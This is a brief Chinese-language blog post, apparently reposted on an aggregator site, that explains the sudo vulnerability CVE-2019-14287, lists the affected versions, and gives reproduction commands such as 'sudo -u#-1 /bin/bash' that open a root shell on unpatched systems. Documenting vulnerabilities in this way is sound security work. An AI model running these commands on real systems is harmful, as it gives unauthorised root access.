CVE-2019-14287(sudo提权)
生活随笔
收集整理的這篇文章主要介紹了
CVE-2019-14287(sudo提权)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
文章目錄
- 漏洞描述
- 影響版本
- 復現
漏洞描述
如果sudo配置允許用戶通過Runas規范中定義的ALL關鍵字來以任意用戶身份運行命令,那么攻擊者有可能通過制定用戶ID以root權限執行惡意命令
影響版本
sudo版本<1.8.28
查看sudo版本命令
sudo -V
復現
前提:需要知道普通賬號密碼
以root身份執行命令: sudo -u#-1 id 或 sudo -u#4294967259 whoami以root身份登錄: sudo -u#-1 /bin/bash 或 sudo -u#4294967259 /bin/bash總結
以上是生活随笔為你收集整理的CVE-2019-14287(sudo提权)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 番茄小说APP怎么退出全屏阅读
- 下一篇: CVE-2020-0796复现(poc+